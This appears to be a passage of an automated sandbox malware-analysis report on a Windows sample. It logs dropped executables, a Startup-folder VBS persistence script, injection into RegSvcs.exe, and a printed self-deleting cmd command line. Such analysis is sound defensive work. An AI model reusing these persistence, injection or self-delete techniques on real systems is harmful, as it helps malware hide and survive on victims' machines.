                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe "C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe "C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe"
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lecheries.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\konked\lecheries.exe "C:\Users\user\AppData\Local\konked\lecheries.exe"
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\konked\lecheries.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
                  Source: unknownProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\error_log.txt
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeProcess created: C:\Users\user\AppData\Local\konked\lecheries.exe "C:\Users\user\Desktop\8kDIr4ZdNj.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\8kDIr4ZdNj.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe "C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe "C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\konked\lecheries.exe "C:\Users\user\AppData\Local\konked\lecheries.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\konked\lecheries.exe" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3Jump to behavior
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeWindow detected: Number of UI elements: 20
                  Source: 8kDIr4ZdNj.exeStatic file information: File size 2382336 > 1048576
                  Source: 8kDIr4ZdNj.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x17d200
                  Source: 8kDIr4ZdNj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: 8kDIr4ZdNj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: 8kDIr4ZdNj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: 8kDIr4ZdNj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: 8kDIr4ZdNj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: 8kDIr4ZdNj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: 8kDIr4ZdNj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: wntdll.pdbUGP source: lecheries.exe, 00000002.00000003.2174226820.0000000004460000.00000004.00001000.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2175460108.0000000004480000.00000004.00001000.00020000.00000000.sdmp, lecheries.exe, 00000008.00000003.2296077476.0000000004380000.00000004.00001000.00020000.00000000.sdmp, lecheries.exe, 00000008.00000003.2293614449.00000000041E0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: lecheries.exe, 00000002.00000003.2174226820.0000000004460000.00000004.00001000.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2175460108.0000000004480000.00000004.00001000.00020000.00000000.sdmp, lecheries.exe, 00000008.00000003.2296077476.0000000004380000.00000004.00001000.00020000.00000000.sdmp, lecheries.exe, 00000008.00000003.2293614449.00000000041E0000.00000004.00001000.00020000.00000000.sdmp
                  Source: 8kDIr4ZdNj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: 8kDIr4ZdNj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: 8kDIr4ZdNj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: 8kDIr4ZdNj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: 8kDIr4ZdNj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_00894B37 LoadLibraryA,GetProcAddress,0_2_00894B37
                  Source: EmbeddedExe1.exe.3.drStatic PE information: section name: .00cfg
                  Source: EmbeddedExe1.exe.3.drStatic PE information: section name: .gxfg
                  Source: EmbeddedExe1.exe.3.drStatic PE information: section name: _RDATA
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008A4257 push edi; ret 0_2_008A4259
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008A426B push edi; ret 0_2_008A426D
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008B8945 push ecx; ret 0_2_008B8958
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008D794B pushad ; retf 0_2_008D794C
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B7426B push edi; ret 2_2_00B7426D
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B74257 push edi; ret 2_2_00B74259
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B6E79B pushad ; retn 0000h2_2_00B6E79C
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B8B7C7 push esi; ret 2_2_00B8B7C9
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B8B8BC push edi; ret 2_2_00B8B8BE
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B8B816 push edi; ret 2_2_00B8B818
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B88945 push ecx; ret 2_2_00B88958
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B6EAA8 pushad ; retn 0000h2_2_00B6EAA9
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B70A41 push edi; retn 0000h2_2_00B70A42
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B70B89 push edi; retn 0000h2_2_00B70B94
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeFile created: C:\Users\user\AppData\Local\konked\lecheries.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeJump to dropped file

                  Boot Survival

                  barindex
                  Drops VBS files to the startup folder
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lecheries.vbsJump to dropped file
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lecheries.vbsJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lecheries.vbsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\error_log.txtJump to behavior
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008948D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_008948D7
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B648D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00B648D7
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECB97B0 IsIconic,ShowWindow,5_2_00007FF75ECB97B0
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECB9610 IsIconic,SetWindowTextW,SetWindowTextA,5_2_00007FF75ECB9610
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECB96E0 IsIconic,SetWindowTextW,SetWindowTextA,5_2_00007FF75ECB96E0
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008B3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_008B3187
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
